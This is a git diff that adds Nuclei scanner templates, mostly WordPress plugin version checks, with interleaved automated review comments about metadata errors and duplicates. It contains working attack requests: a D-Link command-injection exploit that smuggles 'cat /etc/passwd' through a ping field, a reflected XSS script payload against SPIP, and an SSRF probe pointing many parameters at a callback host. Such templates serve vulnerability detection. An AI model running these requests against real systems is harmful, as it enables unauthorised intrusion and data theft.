+ tags: cve,wordpress,wp-plugin,bot-for-telegram-on-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bot-for-telegram-on-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bot-for-telegram-on-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9824.yaml b/poc/cve/CVE-2024-9824.yaml
new file mode 100644
index 0000000000..ff9f9760f4
--- /dev/null
+++ b/poc/cve/CVE-2024-9824.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9824
+
+info:
+ name: >
+ ImagePress - Image Gallery <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion and Post Title Update
+ author: topscoder
+ severity: low
+ description: >
+ The ImagePress – Image Gallery plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'ip_delete_post' and 'ip_update_post_title' functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts and update post titles.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bce6872-34d4-4675-bce9-e1197d801bce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9824
+ metadata:
+ fofa-query: "wp-content/plugins/image-gallery/"
+ google-query: inurl:"/wp-content/plugins/image-gallery/"
+ shodan-query: 'vuln:CVE-2024-9824'
+ tags: cve,wordpress,wp-plugin,image-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "image-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9860.yaml b/poc/cve/CVE-2024-9860.yaml
new file mode 100644
index 0000000000..2a33e0c9b9
--- /dev/null
+++ b/poc/cve/CVE-2024-9860.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9860
+
+info:
+ name: >
+ Bridge Core <= 3.3 - Missing Authorization to Authenticated (Subscriber+) Demo Import
+ author: topscoder
+ severity: low
+ description: >
+ The Bridge Core plugin for WordPress is vulnerable to unauthorized modification of data or loss of data due to a missing capability check on the 'import_action' and 'install_plugin_per_demo' functions in versions up to, and including, 3.3. This makes it possible for authenticated attackers with subscriber-level permissions or above, to delete or change plugin settings, import demo data, and install limited plugins.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/968d5d31-2592-4bed-9d18-5877f0d6062e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 6.5
+ cve-id: CVE-2024-9860
+ metadata:
+ fofa-query: "wp-content/plugins/bridge-core/"
+ google-query: inurl:"/wp-content/plugins/bridge-core/"
+ shodan-query: 'vuln:CVE-2024-9860'
+ tags: cve,wordpress,wp-plugin,bridge-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bridge-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bridge-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3')
\ No newline at end of file
diff --git a/poc/cve/cve-2016-7981-2814.yaml b/poc/cve/cve-2016-7981-2814.yaml
index 40ea14c933..a15b21c00b 100644
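Review bot: The CVSS vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L` says no privileges are required, yet the name and description describe a Subscriber+ (authenticated) missing-authorization issue, and the sibling missing-authorization templates at L23, L30 and L34 all carry `PR:L` for the same class of bug. One of the two is wrong; since the vector is copied from the Wordfence entry in `reference:`, check it there and either correct `PR:N` to `PR:L` (which changes the score) or add a comment noting the upstream value was kept deliberately. `severity: low` also does not match the 6.5 score, which falls in the medium band.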
--- a/poc/cve/cve-2016-7981-2814.yaml
+++ b/poc/cve/cve-2016-7981-2814.yaml
@@ -1,4 +1,5 @@
 id: CVE-2016-7981
+
 info:
 name: SPIP 3.1.2 XSS
 author: pikpikcu
@@ -12,19 +13,23 @@ info:
 cvss-score: 6.10
 cve-id: CVE-2016-7981
 cwe-id: CWE-79
+
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
 matchers-condition: and
 matchers:
 - type: word
 words:
 - '">'
 part: body
+
 - type: status
 status:
 - 200
+
 - type: word
 part: header
 words:
diff --git a/poc/cve/cve-2019-16920.yaml b/poc/cve/cve-2019-16920.yaml
new file mode 100644
index 0000000000..d15e9704d0
--- /dev/null
+++ b/poc/cve/cve-2019-16920.yaml
@@ -0,0 +1,59 @@
+id: CVE-2019-16920
+
+info:
+ name: Unauthenticated Multiple D-Link Routers RCE
+ author: dwisiswant0
+ severity: critical
+ description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
+
+ # References:
+ # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
+
+requests:
+ - raw:
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Content-Type: application/x-www-form-urlencoded
+ Connection: close
+ Referer: http://{{Hostname}}/
+ Upgrade-Insecure-Requests: 1
+ html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+ Content-Type: application/x-www-form-urlencoded
+ Connection: close
+ Referer: http://{{Hostname}}/login_pic.asp
+ Cookie: uid=1234123
+ Upgrade-Insecure-Requests: 1
+ html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+ Content-Type: application/x-www-form-urlencoded
+ Connection: close
+ Referer: http://{{Hostname}}/login_pic.asp
+ Cookie: uid=1234123
+ Upgrade-Insecure-Requests: 1
+ html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+ part: body
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/header/host-header-injection_.yaml b/poc/header/host-header-injection_.yaml
new file mode 100644
index 0000000000..9166fdec4d
--- /dev/null
+++ b/poc/header/host-header-injection_.yaml
@@ -0,0 +1,32 @@
+id: host-header-injection
+
+info:
+ name: Host Header Injection
+ author: princechaddha
+ severity: info
+ description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input.
+ reference:
+ - https://portswigger.net/web-security/host-header
+ - https://portswigger.net/web-security/host-header/exploiting
+ - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/
+ tags: hostheader-injection,generic
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ headers:
+ Host: "{{randstr}}.tld"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}.tld'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/injection/host-header-injection_.yaml b/poc/injection/host-header-injection_.yaml
new file mode 100644
index 0000000000..9166fdec4d
--- /dev/null
+++ b/poc/injection/host-header-injection_.yaml
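Review bot: The only reference for this template lives in the commented-out `# References:` / `# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r` lines and there is no `classification:` block, so the CVE id and source are invisible to anything that reads `reference:` and `cve-id`; move the link into `reference:` and add `classification:` with `cve-id: CVE-2019-16920`, as every other CVE template in this commit does. `requests:` is the legacy top-level key while the new templates elsewhere in this commit use `http:`, so this file depends on the engine still accepting the old name and is inconsistent with its siblings. If the hunk is faithful, none of the three raw requests has a blank line between `Upgrade-Insecure-Requests: 1` and the form body, which would make the body line parse as a header; verify against the upstream file, since the line collapse on this page may have dropped those blank lines. The matcher block's `"root:[x*]:0:0:"` and the win.ini section pattern under `condition: or` are fine as evidence, but a `critical` hit here is an active command-injection confirmation, so the template should carry a comment stating that it executes commands on the target and is not a passive check.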
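Review bot: This file is byte-identical to `poc/injection/host-header-injection_.yaml` added in the next hunk at L39 (same blob `9166fdec4d`) and both declare `id: host-header-injection`, so loading the tree yields a duplicate template id and two identical requests per target; keep one copy or give the second a distinct id and path. `condition: and` under a single-entry `words:` list is a no-op and can be dropped. The check only shows that the injected `Host` value is reflected in the body, which is the info-level signal the `severity` claims, but the description should say that reflection alone (for example in a canonical link) does not by itself demonstrate the cache- or reset-poisoning scenarios the PortSwigger references describe, e.g. append `A match means the supplied Host value is reflected in the response body; impact must be assessed manually.`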
@@ -0,0 +1,32 @@
+id: host-header-injection
+
+info:
+ name: Host Header Injection
+ author: princechaddha
+ severity: info
+ description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input.
+ reference:
+ - https://portswigger.net/web-security/host-header
+ - https://portswigger.net/web-security/host-header/exploiting
+ - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/
+ tags: hostheader-injection,generic
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ headers:
+ Host: "{{randstr}}.tld"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}.tld'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/other/2d-tag-cloud-widget-by-sujin.yaml b/poc/other/2d-tag-cloud-widget-by-sujin.yaml
new file mode 100644
index 0000000000..a53bdeffa3
--- /dev/null
+++ b/poc/other/2d-tag-cloud-widget-by-sujin.yaml
@@ -0,0 +1,59 @@
+id: 2d-tag-cloud-widget-by-sujin
+
+info:
+ name: >
+ 2D Tag Cloud <= 6.0.2 - Reflected Cross-Site Scripting via add_query_arg Parameter
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/2d-tag-cloud-widget-by-sujin/"
+ google-query: inurl:"/wp-content/plugins/2d-tag-cloud-widget-by-sujin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,2d-tag-cloud-widget-by-sujin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/2d-tag-cloud-widget-by-sujin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "2d-tag-cloud-widget-by-sujin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.2')
\ No newline at end of file
diff --git a/poc/other/category-icon.yaml b/poc/other/category-icon.yaml
new file mode 100644
index 0000000000..9e47aa7837
--- /dev/null
+++ b/poc/other/category-icon.yaml
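Review bot: `description: >` is an empty block scalar and `cvss-metrics:`, `cvss-score:` and `cve-id:` carry no value, while `tags:` still lists `cve` and `shodan-query: 'vuln:'` has no identifier, so this template ships with no usable classification; the hunks at L41 (`category-icon`) and L42 (`image-gallery`) have exactly the same holes. Each of the three is otherwise the same readme.txt version check as a CVE template already added in this commit (this one repeats CVE-2024-9670 at L27, category-icon repeats CVE-2024-8915 at L21, image-gallery repeats CVE-2024-9824 at L34) under a different `id` and a `?source=api-scan` reference, so every affected host will be reported twice with one of the two reports unclassified. Either drop the `poc/other` copies or fill `cve-id`, `cvss-score`, `cvss-metrics` and the description from the matching CVE file, and remove the `cve` tag from any template that has no CVE to point at.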
@@ -0,0 +1,59 @@
+id: category-icon
+
+info:
+ name: >
+ Category Icon <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/category-icon/"
+ google-query: inurl:"/wp-content/plugins/category-icon/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,category-icon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/category-icon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "category-icon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/other/image-gallery.yaml b/poc/other/image-gallery.yaml
new file mode 100644
index 0000000000..4e155aca43
--- /dev/null
+++ b/poc/other/image-gallery.yaml
@@ -0,0 +1,59 @@
+id: image-gallery
+
+info:
+ name: >
+ ImagePress - Image Gallery <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion and Post Title Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bce6872-34d4-4675-bce9-e1197d801bce?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/image-gallery/"
+ google-query: inurl:"/wp-content/plugins/image-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,image-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "image-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/other/mynx-page-builder.yaml b/poc/other/mynx-page-builder.yaml
new file mode 100644
index 0000000000..0c2a4bd27d
--- /dev/null
+++ b/poc/other/mynx-page-builder.yaml
@@ -0,0 +1,59 @@
+id: mynx-page-builder
+
+info:
+ name: >
+ Mynx Page Builder <= 0.27.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a25208-81fe-4337-a344-1c129bd80862?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mynx-page-builder/"
+ google-query: inurl:"/wp-content/plugins/mynx-page-builder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mynx-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mynx-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mynx-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.27.8')
\ No newline at end of file
diff --git a/poc/other/paypal-gift-certificate.yaml b/poc/other/paypal-gift-certificate.yaml
new file mode 100644
index 0000000000..4c8692e3cf
--- /dev/null
+++ b/poc/other/paypal-gift-certificate.yaml
@@ -0,0 +1,59 @@
+id: paypal-gift-certificate
+
+info:
+ name: >
+ Easy PayPal Gift Certificate <= 1.2.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via wpppgc_plugin_options
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-gift-certificate/"
+ google-query: inurl:"/wp-content/plugins/paypal-gift-certificate/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,paypal-gift-certificate,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-gift-certificate/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-gift-certificate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml b/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml
new file mode 100644
index 0000000000..225f7322be
--- /dev/null
+++ b/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml
@@ -0,0 +1,59 @@
+id: bot-for-telegram-on-woocommerce
+
+info:
+ name: >
+ Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a662c904-ba2e-494c-a603-b22eeeddf43d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bot-for-telegram-on-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/bot-for-telegram-on-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bot-for-telegram-on-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bot-for-telegram-on-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bot-for-telegram-on-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.4')
\ No newline at end of file
diff --git a/poc/remote_code_execution/order-attachments-for-woocommerce.yaml b/poc/remote_code_execution/order-attachments-for-woocommerce.yaml
new file mode 100644
index 0000000000..f2e2bc712c
--- /dev/null
+++ b/poc/remote_code_execution/order-attachments-for-woocommerce.yaml
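Review bot: The file is placed under `poc/remote_code_execution/`, but its `name` describes a Telegram bot token disclosure leading to authentication bypass, and the following order-attachments-for-woocommerce hunk, filed in the same directory, describes a limited file upload; neither is remote code execution, so anyone triaging or scoping scans by directory will mis-prioritise these two. Moving them next to the other plugin version checks in this commit (`poc/other/`) or into a directory named for the actual weakness class would keep the tree honest. The `severity: low` given in both templates agrees with their names, which makes the directory the odd one out.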
@@ -0,0 +1,59 @@
+id: order-attachments-for-woocommerce
+
+info:
+ name: >
+ Order Attachments for WooCommerce 2.0 - 2.4.1 - Missing Authorization to Authenticated (Subscriber+) Limited Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfc8957-78b8-4c55-ba95-52d95b086341?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/order-attachments-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/order-attachments-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,order-attachments-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/order-attachments-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "order-attachments-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '>= 2.0', '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/social/dvk-social-sharing.yaml b/poc/social/dvk-social-sharing.yaml
new file mode 100644
index 0000000000..278197c61e
--- /dev/null
+++ b/poc/social/dvk-social-sharing.yaml
@@ -0,0 +1,59 @@
+id: dvk-social-sharing
+
+info:
+ name: >
+ Social Sharing (by Danny) <= 1.3.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/dvk-social-sharing/"
+ google-query: inurl:"/wp-content/plugins/dvk-social-sharing/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,dvk-social-sharing,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dvk-social-sharing/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dvk-social-sharing"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.7')
\ No newline at end of file
diff --git a/poc/ssrf/ssrf-detect.yaml b/poc/ssrf/ssrf-detect.yaml
new file mode 100644
index 0000000000..6276c76b83
--- /dev/null
+++ b/poc/ssrf/ssrf-detect.yaml
@@ -0,0 +1,21 @@
+id: generic-ssrf
+
+info:
+ name: generic-ssrf
+ author: nagli
+ severity: high
+ reference: ssrf
+ tags: ssrf
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}http://{{interactsh-url}}'
+ - '{{BaseURL}}test&access={{interactsh-url}}&remote_url={{interactsh-url}}&admin={{interactsh-url}}&dbg={{interactsh-url}}&debug={{interactsh-url}}&edit={{interactsh-url}}&grant={{interactsh-url}}&test={{interactsh-url}}&alter={{interactsh-url}}&clone={{interactsh-url}}&create={{interactsh-url}}&delete={{interactsh-url}}&disable={{interactsh-url}}&enable={{interactsh-url}}&exec={{interactsh-url}}&execute={{interactsh-url}}&load={{interactsh-url}}&make={{interactsh-url}}&modify={{interactsh-url}}&rename={{interactsh-url}}&reset={{interactsh-url}}&shell={{interactsh-url}}&toggle={{interactsh-url}}&adm={{interactsh-url}}&root={{interactsh-url}}&cfg={{interactsh-url}}&dest={{interactsh-url}}&redirect={{interactsh-url}}&uri={{interactsh-url}}&path={{interactsh-url}}&continue={{interactsh-url}}&url={{interactsh-url}}&window={{interactsh-url}}&next={{interactsh-url}}&data={{interactsh-url}}&reference={{interactsh-url}}&site={{interactsh-url}}&html={{interactsh-url}}&val={{interactsh-url}}&validate={{interactsh-url}}&domain={{interactsh-url}}&callback={{interactsh-url}}&return={{interactsh-url}}&page={{interactsh-url}}&feed={{interactsh-url}}&host={{interactsh-url}}&port={{interactsh-url}}&to={{interactsh-url}}&out={{interactsh-url}}&view={{interactsh-url}}&dir={{interactsh-url}}&show={{interactsh-url}}&navigation={{interactsh-url}}&open={{interactsh-url}}&file={{interactsh-url}}&document={{interactsh-url}}&folder={{interactsh-url}}&pg={{interactsh-url}}&php_path={{interactsh-url}}&style={{interactsh-url}}&doc={{interactsh-url}}&img={{interactsh-url}}&filename={{interactsh-url}}'
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "http"
+ - "dns"
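Review bot: `id: generic-ssrf` does not match the file name `ssrf-detect.yaml`, and `reference: ssrf` is a bare word where every other template in this commit gives a list of URLs, so the template is effectively undocumented; I'd set `id: ssrf-detect` (or rename the file) and either supply real references or drop the key. The word matcher accepts a `dns` interaction on its own, and the inline comment `# Confirms the DNS Interaction` suggests that is deliberate, but a DNS lookup can be triggered by resolvers, link previewers and security proxies without the target ever making an outbound HTTP request, so `severity: high` on a DNS-only hit will produce false positives — restricting `words` to `"http"`, or documenting that a DNS-only result needs manual confirmation, would make the finding trustworthy. The second path joins `{{BaseURL}}test&access=…` with no `?`, so the whole parameter list is sent as part of the URL path rather than as a query string; that looks unintended, please confirm. The `requests:` key is the older form, while the plugin templates in this commit use `http:`.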